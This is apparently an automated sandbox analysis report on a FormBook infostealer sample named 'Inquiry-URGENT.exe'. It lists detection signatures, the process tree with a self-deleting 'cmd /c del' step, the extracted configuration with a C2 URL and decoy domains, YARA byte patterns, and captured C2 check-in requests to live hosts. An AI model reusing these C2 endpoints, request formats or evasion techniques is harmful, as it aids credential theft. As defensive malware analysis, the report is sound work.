Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Inquiry-URGENT.exe

Overview

General Information

Sample Name:Inquiry-URGENT.exe
Analysis ID:491567
MD5:001127ea6a36d3b93e8c54ff1b8f22b8
SHA1:acd9171ec5641efc54a16c5c18184dd6e25138c8
SHA256:2728dc98fdebc00823b877eba49ace782c17db8a07074634aafca9dc00277776
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Inquiry-URGENT.exe (PID: 6760 cmdline: 'C:\Users\user\Desktop\Inquiry-URGENT.exe' MD5: 001127EA6A36D3B93E8C54FF1B8F22B8)
    • Inquiry-URGENT.exe (PID: 7112 cmdline: C:\Users\user\Desktop\Inquiry-URGENT.exe MD5: 001127EA6A36D3B93E8C54FF1B8F22B8)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 4684 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 3080 cmdline: /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rheilea.com/b5ce/"], "decoy": ["advellerd.xyz", "giasuvina.com", "arab-xt-pro.com", "ahsltu2ua4.com", "trasportesemmanuel.com", "kissimmeesoccercup.com", "studyengland.com", "m2volleyballclub.com", "shyuehuan.com", "elsml.com", "blog-x-history.top", "coditeu.com", "allattachments.net", "vigautruc.com", "mentication.com", "zambiaedu.xyz", "filadelfiacenter.com", "avlaborsourceinc.info", "tameka-stewart.com", "studio-cleo.com", "cruisebookingsonlineukweb.com", "bajajfinservmutualfund.com", "bipxtech.cloud", "glottogon.com", "villamante.com", "lvfrm.xyz", "bhadanamedia.digital", "austindemolitioncontractor.com", "nutritionhawks.com", "vcmalihx.top", "busybstickerco.com", "lianshangtron.com", "tenncreative.com", "charmfulland.com", "zuridesire.com", "vliegenmetplezier.com", "khlopok.club", "tovardarom.xyz", "atmospheraglobal.com", "lakeefctmich.com", "novasaude-g1.online", "joymort.com", "allexceptionalcapital.com", "balicoffeeuniversal.com", "netjyjin26.net", "arpdomestic.com", "ozglobetips.online", "zeogg.club", "josiemaran-supernatural.com", "sieuthinhapkhau.store", "healthonline.store", "coiincrypt.com", "fofija.com", "yshowmedia.com", "enhancedcr.com", "tous-des-cons.club", "holeinthewallbus.com", "okssl.net", "gutenstocks.com", "thelindleyfamily.com", "apexpropertiesltd.com", "powerhousetepusa.com", "urbanopportunities.com", "comarch.tech"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
    • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
    • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.Inquiry-URGENT.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.Inquiry-URGENT.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.Inquiry-URGENT.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
        • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
        • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
        • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
        2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x5ce58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x5d1e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x68ef5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x689e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x68ff7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x6916f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x5dbfa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x67c5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x5e972:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x6e3c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x6f46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 4684
          Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 4684

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rheilea.com/b5ce/"], "decoy": ["advellerd.xyz", "giasuvina.com", "arab-xt-pro.com", "ahsltu2ua4.com", "trasportesemmanuel.com", "kissimmeesoccercup.com", "studyengland.com", "m2volleyballclub.com", "shyuehuan.com", "elsml.com", "blog-x-history.top", "coditeu.com", "allattachments.net", "vigautruc.com", "mentication.com", "zambiaedu.xyz", "filadelfiacenter.com", "avlaborsourceinc.info", "tameka-stewart.com", "studio-cleo.com", "cruisebookingsonlineukweb.com", "bajajfinservmutualfund.com", "bipxtech.cloud", "glottogon.com", "villamante.com", "lvfrm.xyz", "bhadanamedia.digital", "austindemolitioncontractor.com", "nutritionhawks.com", "vcmalihx.top", "busybstickerco.com", "lianshangtron.com", "tenncreative.com", "charmfulland.com", "zuridesire.com", "vliegenmetplezier.com", "khlopok.club", "tovardarom.xyz", "atmospheraglobal.com", "lakeefctmich.com", "novasaude-g1.online", "joymort.com", "allexceptionalcapital.com", "balicoffeeuniversal.com", "netjyjin26.net", "arpdomestic.com", "ozglobetips.online", "zeogg.club", "josiemaran-supernatural.com", "sieuthinhapkhau.store", "healthonline.store", "coiincrypt.com", "fofija.com", "yshowmedia.com", "enhancedcr.com", "tous-des-cons.club", "holeinthewallbus.com", "okssl.net", "gutenstocks.com", "thelindleyfamily.com", "apexpropertiesltd.com", "powerhousetepusa.com", "urbanopportunities.com", "comarch.tech"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Inquiry-URGENT.exeVirustotal: Detection: 36%Perma Link
          Source: Inquiry-URGENT.exeMetadefender: Detection: 22%Perma Link
          Source: Inquiry-URGENT.exeReversingLabs: Detection: 71%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://www.trasportesemmanuel.com/b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP+7L8K6Nslrqzy4UJncL0zvFIM5Fri+7k0NXne0nLY&DJE8X=4hlh3Avira URL Cloud: Label: malware
          Source: http://www.trasportesemmanuel.com/b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRPAvira URL Cloud: Label: malware
          Source: 3.2.Inquiry-URGENT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Inquiry-URGENT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Inquiry-URGENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Inquiry-URGENT.exe, 00000003.00000002.753164134.000000000117F000.00000040.00000001.sdmp, rundll32.exe, 00000008.00000002.939331902.0000000004C0F000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdb source: Inquiry-URGENT.exe, 00000003.00000002.754416564.0000000003070000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Inquiry-URGENT.exe, 00000003.00000002.753164134.000000000117F000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdbGCTL source: Inquiry-URGENT.exe, 00000003.00000002.754416564.0000000003070000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49802 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49802 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49802 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49820 -> 34.252.217.69:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49820 -> 34.252.217.69:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49820 -> 34.252.217.69:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49843 -> 103.100.209.77:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49843 -> 103.100.209.77:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49843 -> 103.100.209.77:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49871 -> 209.99.64.43:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49871 -> 209.99.64.43:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49871 -> 209.99.64.43:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.139 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.5.70.60 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.252.217.69 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.100.209.77 80
          Source: C:\Windows\explorer.exeDomain query: www.tameka-stewart.com
          Source: C:\Windows\explorer.exeDomain query: www.khlopok.club
          Source: C:\Windows\explorer.exeDomain query: www.tovardarom.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.lakeefctmich.com
          Source: C:\Windows\explorer.exeDomain query: www.apexpropertiesltd.com
          Source: C:\Windows\explorer.exeDomain query: www.bajajfinservmutualfund.com
          Source: C:\Windows\explorer.exeDomain query: www.nutritionhawks.com
          Source: C:\Windows\explorer.exeDomain query: www.zambiaedu.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.61.210 80
          Source: C:\Windows\explorer.exeDomain query: www.trasportesemmanuel.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.josiemaran-supernatural.com
          Source: C:\Windows\explorer.exeDomain query: www.lianshangtron.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.tovardarom.xyz
          Source: C:\Windows\explorer.exeDNS query: www.zambiaedu.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.rheilea.com/b5ce/
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: Joe Sandbox ViewASN Name: ALTUSNL ALTUSNL
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=/AI3JQDCZyk/6ubsQmnvJO3EeIaIHb6AvonvM2F4xgXAwnTSleK6/XaIEVHpjjtFOEyF&DJE8X=4hlh3 HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=wzjkW/L/N1XOH+XSD0678S8O9bVA9y0oVtkfQbp3MHT7u8jt+16wQlgR8fjrLlP4MYPZ&DJE8X=4hlh3 HTTP/1.1Host: www.apexpropertiesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=4jQHwSxHHIZwFcDn9YyiwFwOuX4cum7XsZ3DkRiOKi2AyYToUWCX9nZ4+Axc57SiIQXe&DJE8X=4hlh3 HTTP/1.1Host: www.tameka-stewart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&DJE8X=4hlh3 HTTP/1.1Host: www.khlopok.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=DJnvNV/6mp+JehKrIaw09sUOMJEcD/JystEz9B9fnmezvaywTqAFSPdXHnxiLUzhPCdJ&DJE8X=4hlh3 HTTP/1.1Host: www.tovardarom.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&DJE8X=4hlh3 HTTP/1.1Host: www.lianshangtron.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=iJSCg4qWtYnzw4GHWivdfaPpYoJ+2S3Wh/71x72UXIcZgXPac3WPQ9rqQY8gaQxsRQ0f&DJE8X=4hlh3 HTTP/1.1Host: www.nutritionhawks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP+7L8K6Nslrqzy4UJncL0zvFIM5Fri+7k0NXne0nLY&DJE8X=4hlh3 HTTP/1.1Host: www.trasportesemmanuel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Sep 2021 15:55:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 488Connection: closeVary: Accept-EncodingETag: "5f6c8b3c-1e8"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 d0 97 d0 b0 d0 bf d1 80 d0 be d1 81 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 20 d0 b8 d0 bb d0 b8 20 d1 83 d0 b4 d0 b0 d0 bb d0 b5 d0 bd 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d0 b0 d1 8f 20 d1 81 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 d0 b8 d0 bb d0 b8 20 d1 83 d0 b4 d0 b0 d0 bb d0 b5 d0 bd d0 b0 2e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="ru"> <head> <title>404</title> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta content=" " name="description" /> </head> <body> <br/><br/><br/> <center> <h1> .</h1> </center> </body></html>
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/Best_Mortgage_Rates.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/Free_Credit_Report.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1N
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/Migraine_Pain_Relief.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/Top_10_Luxury_Cars.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1N
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/Top_Smart_Phones.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/display.cfm
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/fashion_trends.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ4p
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://findquickresultsnow.com/song_lyrics.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ4pPrs
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
